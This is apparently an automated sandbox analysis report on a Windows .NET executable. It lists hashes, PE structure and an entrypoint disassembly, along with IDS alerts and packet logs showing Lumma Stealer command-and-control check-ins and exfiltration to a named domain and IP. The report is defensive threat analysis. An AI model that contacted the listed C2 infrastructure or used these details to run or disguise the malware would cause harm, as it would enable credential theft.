SHA512:	812ca872181a465da7520a1d35650e627be0dcf9c0e69b565d922e769a03435fd96c5de2c1c5bd7886b612150553e3f4ce2dc66eba7bcfab48347d483b22eee1
SSDEEP:	6144:79vDaZsyLEytXezKn30u5V8htQ0XFLcr7Hf/ouoM9QhP6INgaQZMyKl1mRYeK+s:xraZLQytXezKku5WXWr7frf/KlQeVl
TLSH:	EA9612759987DAB1D20E9C3454A3009349F5A749A307BF8FFE9A4618DB137CF2092DC6
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....C,...............0.................. ........@.. ....................................`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x40a4be
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xB22C430A [Sun Sep 21 17:53:14 2064 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa470	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc000	0x242	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xe000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xa422	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x84c4	0x8600	e05f1acca24b974a8126be170dff517b	False	0.5043726679104478	data	5.950953039580874	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xc000	0x242	0x400	14d8e51a66bfa2cb04d0bad62fb2e968	False	0.3037109375	data	3.5160679793070893	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xe000	0xc	0x200	15941323991b3ba9288d6bda059fba10	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.bss	0x10000	0x4f400	0x4f400	492e2e4d4bf828eda49671d796af379c	False	1.0003265477129337	data	7.999441028712607	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0xc058	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-05T19:28:04.783111+0100	2058550	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (undesirabkel .click)	1	192.168.2.4	59795	1.1.1.1	53	UDP
2025-01-05T19:28:05.273757+0100	2058551	ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)	1	192.168.2.4	49730	188.114.97.3	443	TCP
2025-01-05T19:28:05.273757+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49730	188.114.97.3	443	TCP
2025-01-05T19:28:05.774460+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49730	188.114.97.3	443	TCP
2025-01-05T19:28:05.774460+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49730	188.114.97.3	443	TCP
2025-01-05T19:28:06.272985+0100	2058551	ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)	1	192.168.2.4	49732	188.114.97.3	443	TCP
2025-01-05T19:28:06.272985+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49732	188.114.97.3	443	TCP
2025-01-05T19:28:06.754386+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49732	188.114.97.3	443	TCP
2025-01-05T19:28:06.754386+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49732	188.114.97.3	443	TCP
2025-01-05T19:28:07.385844+0100	2058551	ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)	1	192.168.2.4	49734	188.114.97.3	443	TCP
2025-01-05T19:28:07.385844+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49734	188.114.97.3	443	TCP
2025-01-05T19:28:08.797316+0100	2058551	ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)	1	192.168.2.4	49737	188.114.97.3	443	TCP
2025-01-05T19:28:08.797316+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49737	188.114.97.3	443	TCP
2025-01-05T19:28:09.331455+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49737	188.114.97.3	443	TCP
2025-01-05T19:28:09.936606+0100	2058551	ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)	1	192.168.2.4	49739	188.114.97.3	443	TCP
2025-01-05T19:28:09.936606+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49739	188.114.97.3	443	TCP
2025-01-05T19:28:11.187401+0100	2058551	ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)	1	192.168.2.4	49742	188.114.97.3	443	TCP
2025-01-05T19:28:11.187401+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49742	188.114.97.3	443	TCP
2025-01-05T19:28:12.489654+0100	2058551	ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)	1	192.168.2.4	49744	188.114.97.3	443	TCP
2025-01-05T19:28:12.489654+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49744	188.114.97.3	443	TCP
2025-01-05T19:28:16.025216+0100	2058551	ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)	1	192.168.2.4	49747	188.114.97.3	443	TCP
2025-01-05T19:28:16.025216+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49747	188.114.97.3	443	TCP
2025-01-05T19:28:16.531093+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49747	188.114.97.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 5, 2025 19:28:04.802619934 CET	49730	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:04.802673101 CET	443	49730	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:04.802834988 CET	49730	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:04.805480957 CET	49730	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:04.805495024 CET	443	49730	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:05.273679018 CET	443	49730	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:05.273756981 CET	49730	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:05.278239965 CET	49730	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:05.278251886 CET	443	49730	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:05.278491974 CET	443	49730	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:05.325757027 CET	49730	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:05.365035057 CET	49730	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:05.365273952 CET	49730	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:05.365298986 CET	443	49730	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:05.774455070 CET	443	49730	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:05.774555922 CET	443	49730	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:05.774633884 CET	49730	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:05.776495934 CET	49730	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:05.776510954 CET	443	49730	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:05.776843071 CET	49730	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:05.776849031 CET	443	49730	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:05.783849001 CET	49732	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:05.783886909 CET	443	49732	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:05.783948898 CET	49732	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:05.784204006 CET	49732	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:05.784216881 CET	443	49732	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:06.272886992 CET	443	49732	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:06.272984982 CET	49732	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:06.300836086 CET	49732	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:06.300849915 CET	443	49732	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:06.301126957 CET	443	49732	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:06.302745104 CET	49732	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:06.302860975 CET	49732	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:06.302875996 CET	443	49732	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:06.754390955 CET	443	49732	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:06.754443884 CET	443	49732	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:06.754482031 CET	443	49732	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:06.754514933 CET	443	49732	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:06.754524946 CET	49732	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:06.754539013 CET	443	49732	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:06.754559040 CET	49732	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:06.754571915 CET	443	49732	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:06.754607916 CET	49732	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:06.754607916 CET	443	49732	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:06.754621029 CET	443	49732	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:06.754657984 CET	49732	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:06.754663944 CET	443	49732	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:06.755091906 CET	443	49732	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:06.755126953 CET	443	49732	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:06.755134106 CET	49732	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:06.755141020 CET	443	49732	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:06.755191088 CET	49732	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:06.759062052 CET	443	49732	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:06.810142994 CET	49732	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:06.844696045 CET	443	49732	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:06.846612930 CET	443	49732	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:06.846647024 CET	443	49732	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:06.846672058 CET	49732	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:06.846681118 CET	443	49732	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:06.846726894 CET	49732	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:06.846733093 CET	443	49732	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:06.846746922 CET	443	49732	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:06.846796036 CET	49732	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:06.846946955 CET	49732	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:06.846957922 CET	443	49732	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:06.846967936 CET	49732	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:06.846973896 CET	443	49732	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:06.928878069 CET	49734	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:06.928896904 CET	443	49734	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:06.929008007 CET	49734	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:06.929327011 CET	49734	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:06.929337978 CET	443	49734	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:07.385766983 CET	443	49734	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:07.385843992 CET	49734	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:07.387260914 CET	49734	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:07.387265921 CET	443	49734	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:07.387504101 CET	443	49734	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:07.394431114 CET	49734	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:07.394575119 CET	49734	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:07.394608974 CET	443	49734	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:07.394673109 CET	49734	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:07.394681931 CET	443	49734	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:08.302692890 CET	443	49734	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:08.302799940 CET	443	49734	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:08.303229094 CET	49734	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:08.303389072 CET	49734	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:08.303400040 CET	443	49734	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:08.321259975 CET	49737	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:08.321290016 CET	443	49737	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:08.321377039 CET	49737	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:08.321628094 CET	49737	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:08.321641922 CET	443	49737	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:08.797213078 CET	443	49737	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:08.797316074 CET	49737	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:08.798530102 CET	49737	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:08.798537016 CET	443	49737	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:08.798760891 CET	443	49737	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:08.809423923 CET	49737	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:08.809533119 CET	49737	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:08.809565067 CET	443	49737	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:09.331459999 CET	443	49737	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:09.331563950 CET	443	49737	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:09.331630945 CET	49737	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:09.357018948 CET	49737	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:09.357036114 CET	443	49737	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:09.449690104 CET	49739	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:09.449742079 CET	443	49739	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:09.449809074 CET	49739	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:09.450464964 CET	49739	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:09.450483084 CET	443	49739	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:09.936507940 CET	443	49739	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:09.936605930 CET	49739	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:09.938374996 CET	49739	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:09.938386917 CET	443	49739	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:09.938621044 CET	443	49739	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:09.940077066 CET	49739	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:09.940210104 CET	49739	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:09.940246105 CET	443	49739	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:09.940325022 CET	49739	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:09.940335989 CET	443	49739	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:10.567162037 CET	443	49739	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:10.567262888 CET	443	49739	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:10.567358971 CET	49739	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:10.567548990 CET	49739	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:10.567559004 CET	443	49739	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:10.709353924 CET	49742	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:10.709383965 CET	443	49742	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:10.709465981 CET	49742	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:10.709856987 CET	49742	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:10.709868908 CET	443	49742	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:11.187196970 CET	443	49742	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:11.187401056 CET	49742	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:11.188688040 CET	49742	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:11.188695908 CET	443	49742	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:11.188936949 CET	443	49742	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:11.196902990 CET	49742	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:11.196995974 CET	49742	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:11.197000980 CET	443	49742	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:11.651036024 CET	443	49742	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:11.651135921 CET	443	49742	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:11.651191950 CET	49742	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:11.651351929 CET	49742	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:11.651366949 CET	443	49742	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:11.997894049 CET	49744	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:11.997924089 CET	443	49744	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:11.997994900 CET	49744	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:11.998253107 CET	49744	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:11.998262882 CET	443	49744	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:12.489573002 CET	443	49744	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:12.489654064 CET	49744	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:12.490909100 CET	49744	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:12.490917921 CET	443	49744	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:12.491131067 CET	443	49744	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:12.492393970 CET	49744	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:12.493160963 CET	49744	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:12.493185043 CET	443	49744	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:12.493289948 CET	49744	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:12.493325949 CET	443	49744	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:12.493449926 CET	49744	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:12.493482113 CET	443	49744	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:12.493619919 CET	49744	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:12.493649006 CET	443	49744	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:12.493796110 CET	49744	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:12.493828058 CET	443	49744	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:12.494004965 CET	49744	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:12.494033098 CET	443	49744	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:12.494040966 CET	49744	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:12.494052887 CET	443	49744	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:12.494234085 CET	49744	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:12.494262934 CET	443	49744	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:12.494283915 CET	49744	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:12.494425058 CET	49744	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:12.494460106 CET	49744	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:12.503329992 CET	443	49744	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:12.503532887 CET	49744	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:12.503559113 CET	443	49744	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:12.503585100 CET	49744	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:12.503598928 CET	443	49744	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:12.503629923 CET	49744	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:12.508178949 CET	443	49744	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:15.562730074 CET	443	49744	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:15.562829971 CET	443	49744	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:15.562985897 CET	49744	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:15.563051939 CET	49744	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:15.563072920 CET	443	49744	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:15.567374945 CET	49747	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:15.567409992 CET	443	49747	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:15.567488909 CET	49747	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:15.567815065 CET	49747	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:15.567828894 CET	443	49747	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:16.025156975 CET	443	49747	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:16.025216103 CET	49747	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:16.026499987 CET	49747	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:16.026506901 CET	443	49747	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:16.026710987 CET	443	49747	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:16.027962923 CET	49747	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:16.027987957 CET	49747	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:16.028018951 CET	443	49747	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:16.531112909 CET	443	49747	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:16.531155109 CET	443	49747	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:16.531183004 CET	443	49747	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:16.531210899 CET	443	49747	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:16.531212091 CET	49747	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:16.531241894 CET	443	49747	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:16.531258106 CET	49747	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:16.531277895 CET	443	49747	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:16.531306028 CET	443	49747	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:16.531336069 CET	443	49747	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:16.531342030 CET	49747	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:16.531348944 CET	443	49747	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:16.531371117 CET	49747	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:16.531838894 CET	443	49747	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:16.531862020 CET	443	49747	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:16.531888008 CET	49747	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:16.531896114 CET	443	49747	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:16.531944036 CET	49747	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:16.532278061 CET	443	49747	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:16.532341957 CET	443	49747	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:16.532385111 CET	49747	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:16.532439947 CET	49747	443	192.168.2.4	188.114.97.3
Jan 5, 2025 19:28:16.532454014 CET	443	49747	188.114.97.3	192.168.2.4
Jan 5, 2025 19:28:16.532466888 CET	49747	443	192.168.2.4	188.114.97.3
